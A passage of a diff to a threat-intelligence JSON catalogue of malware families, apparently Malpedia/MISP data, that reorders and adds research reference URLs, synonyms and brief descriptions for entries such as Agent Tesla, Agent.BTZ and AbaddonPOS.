+ "https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf",
+ "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/",
+ "https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241",
"https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/",
"https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
- "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
- "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/",
- "https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f",
- "https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf",
- "https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?",
- "https://community.riskiq.com/article/56fa1b2f",
- "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/",
- "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://malgamy.github.io/malware-analysis/The-Approach-of-TA413-for-Tibetan-Targets/#third-stage",
+ "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
+ "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?",
"https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
- "https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241",
- "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology"
+ "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
+ "https://community.riskiq.com/article/56fa1b2f"
],
"synonyms": [
"8t_dropper",
@@ -11255,24 +11921,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.9002",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf",
+ "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
"https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://www.secureworks.com/research/threat-profiles/bronze-express",
- "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
"https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
- "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-union",
"https://www.infopoint-security.de/medien/the-elderwood-project.pdf",
- "https://attack.mitre.org/groups/G0001/",
- "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
- "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
"https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html",
- "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/",
+ "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html",
+ "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures",
"http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf"
+ "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn"
],
"synonyms": [
"HOMEUNIX",
@@ -11298,16 +11964,16 @@
"value": "Abaddon"
},
{
- "description": "",
+ "description": "MajorGeeks describes this malware as trying to locate credit card data by reading the memory of all processes except itself by first blacklisting its own PID using the GetCurrentProcessId API. Once that data is discovered, it sends this data back to a command and control server using a custom binary protocol instead of HTTP.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos",
- "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software",
- "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
"https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/",
"https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/"
+ "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software",
+ "https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/",
+ "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/"
],
"synonyms": [
"PinkKite",
@@ -11347,8 +12013,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader",
- "https://twitter.com/cocaman/status/1260069549069733888",
- "https://github.com/Tlgyt/AbSent-Loader"
+ "https://github.com/Tlgyt/AbSent-Loader",
+ "https://twitter.com/cocaman/status/1260069549069733888"
],
"synonyms": [],
"type": []
@@ -11374,10 +12040,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
"https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf"
],
"synonyms": [],
"type": []
@@ -11390,10 +12056,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
+ "https://unit42.paloaltonetworks.com/acidbox-rare-malware/",
"https://www.epicturla.com/blog/acidbox-clustering",
- "https://unit42.paloaltonetworks.com/acidbox-rare-malware/"
+ "https://securelist.com/apt-trends-report-q2-2020/97937/"
],
"synonyms": [
"MagicScroll"
@@ -11433,8 +12099,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.adamantium_thief",
- "https://github.com/LimerBoy/Adamantium-Thief",
- "https://twitter.com/ClearskySec/status/1377176015189929989"
+ "https://twitter.com/ClearskySec/status/1377176015189929989",
+ "https://github.com/LimerBoy/Adamantium-Thief"
],
"synonyms": [],
"type": []
@@ -11447,8 +12113,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016",
- "https://twitter.com/JaromirHorejsi/status/813712587997249536"
+ "https://twitter.com/JaromirHorejsi/status/813712587997249536",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016"
],
"synonyms": [],
"type": []
@@ -11487,8 +12153,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot",
- "https://www.bromium.com/second-stage-attack-analysis/",
- "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot"
+ "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot",
+ "https://www.bromium.com/second-stage-attack-analysis/"
],
"synonyms": [],
"type": []
@@ -11509,14 +12175,27 @@
"uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58",
"value": "Adylkuzz"
},
+ {
+ "description": "Ransomware written using .NET.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aesrt",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fb0eb7a8-ab32-4371-96b7-2d19f9064ac5",
+ "value": "AESRT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita",
- "https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md",
"https://twitter.com/_CPResearch_/status/1201957880909484033",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md"
+ "https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html"
],
"synonyms": [],
"type": []
@@ -11529,13 +12208,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.agendacrypt",
+ "https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html",
"https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
- "https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html",
"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/new-golang-ransomware-agenda-customizes-attacks/IOCs-blog-New%20Golang%20Ransomware%20Agenda%20Customizes%20Attacks.txt"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/new-golang-ransomware-agenda-customizes-attacks/IOCs-blog-New%20Golang%20Ransomware%20Agenda%20Customizes%20Attacks.txt",
+ "https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html"
],
"synonyms": [
- "Agenda"
+ "Agenda",
+ "Qilin"
],
"type": []
},
@@ -11547,29 +12228,33 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz",
- "https://docs.broadcom.com/doc/waterbug-attack-group",
- "https://ryancor.medium.com/deobfuscating-powershell-malware-droppers-b6c34499e41d",
- "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4",
- "https://www.secureworks.com/research/threat-profiles/iron-hunter",
- "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/",
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
- "https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
"http://www.intezer.com/new-variants-of-agent-btz-comrat-found/",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
- "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/",
- "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
"https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a",
+ "https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
"http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/",
- "https://unit42.paloaltonetworks.com/ironnetinjector/"
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://artemonsecurity.com/snake_whitepaper.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
+ "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4",
+ "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://docs.broadcom.com/doc/waterbug-attack-group",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://unit42.paloaltonetworks.com/ironnetinjector/",
+ "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html",
+ "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf",
+ "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://ryancor.medium.com/deobfuscating-powershell-malware-droppers-b6c34499e41d"
],
"synonyms": [
"ComRAT",
@@ -11578,15 +12263,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "da079741-05e6-458c-b434-011263dc691c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8",
"value": "Agent.BTZ"
},
@@ -11595,117 +12271,135 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla",
- "https://inquest.net/blog/2021/11/02/adults-only-malware-lures",
- "https://forensicitguy.github.io/agenttesla-rtf-dotnet-tradecraft/",
- "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4",
- "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
- "https://blog.netlab.360.com/purecrypter",
- "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
- "https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked/",
- "https://youtu.be/BM38OshcozE",
- "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
- "https://youtu.be/hxaeWyK8gMI",
- "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
- "https://isc.sans.edu/diary/27666",
+ "https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/",
+ "https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware",
+ "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/",
+ "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf",
+ "https://forensicitguy.github.io/a-tale-of-two-dropper-scripts/",
+ "http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://embee-research.ghost.io/agenttesla-full-analysis-api-hashing/",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://inquest.net/blog/2021/11/02/adults-only-malware-lures",
+ "https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant",
+ "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
+ "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://twitter.com/MsftSecIntel/status/1392219299696152578",
+ "https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware",
+ "https://lab52.io/blog/a-twisted-malware-infection-chain/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
+ "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/",
+ "https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
"https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
+ "https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor",
+ "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/",
+ "https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html",
+ "https://menshaway.blogspot.com/2021/04/agenttesla-malware.html",
+ "https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "https://blog.malwarelab.pl/posts/basfu_aggah/",
+ "https://community.riskiq.com/article/40000d46",
+ "https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware",
+ "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
+ "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/",
+ "https://blog.talosintelligence.com/ipfs-abuse/",
+ "https://blog.netlab.360.com/purecrypter",
+ "https://community.riskiq.com/article/6337984e",
+ "https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked/",
+ "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/",
+ "https://youtu.be/QQuRp7Qiuzg",
+ "https://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://www.telsy.com/download/4832/",
+ "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr",
+ "https://community.riskiq.com/article/56e28880",
+ "https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354",
"https://guillaumeorlando.github.io/AgentTesla",
- "https://cert.gov.ua/article/861292",
- "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/",
+ "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
+ "https://asec.ahnlab.com/ko/29133/",
+ "https://securelist.com/agent-tesla-malicious-spam-campaign/107478/",
+ "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine",
+ "https://malwarebookreports.com/agent-teslaggah/",
+ "https://www.logpoint.com/en/blog/agentteslas-capabilities-review-detection-strategies/",
+ "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/",
"https://www.inde.nz/blog/inside-agenttesla",
"https://isc.sans.edu/diary/rss/28190",
- "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/",
- "https://community.riskiq.com/article/56e28880",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware",
+ "https://youtu.be/hxaeWyK8gMI",
"http://blog.nsfocus.net/sweed-611/",
- "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
- "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
- "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/",
- "https://www.youtube.com/watch?v=Q9_1xNbVQPY",
- "https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
- "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/",
- "https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
- "https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla",
- "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
- "https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant",
- "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/",
- "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
- "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/",
- "https://unit42.paloaltonetworks.com/originlogger/",
- "https://forensicitguy.github.io/a-tale-of-two-dropper-scripts/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
- "https://menshaway.blogspot.com/2021/04/agenttesla-malware.html",
- "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/",
- "https://isc.sans.edu/diary/28202",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://community.riskiq.com/article/6337984e",
- "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/",
+ "https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir",
+ "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
"https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/",
+ "https://www.youtube.com/watch?v=Q9_1xNbVQPY",
+ "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/",
+ "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
"https://isc.sans.edu/diary/rss/27092",
"https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting",
- "https://malwarebookreports.com/agent-teslaggah/",
- "https://blog.minerva-labs.com/preventing-agenttesla",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/",
- "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine",
- "https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/",
- "https://lab52.io/blog/a-twisted-malware-infection-chain/",
- "https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor",
- "https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
- "https://twitter.com/MsftSecIntel/status/1392219299696152578",
- "https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
- "https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware",
- "https://blog.malwarelab.pl/posts/basfu_aggah/",
- "https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
- "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
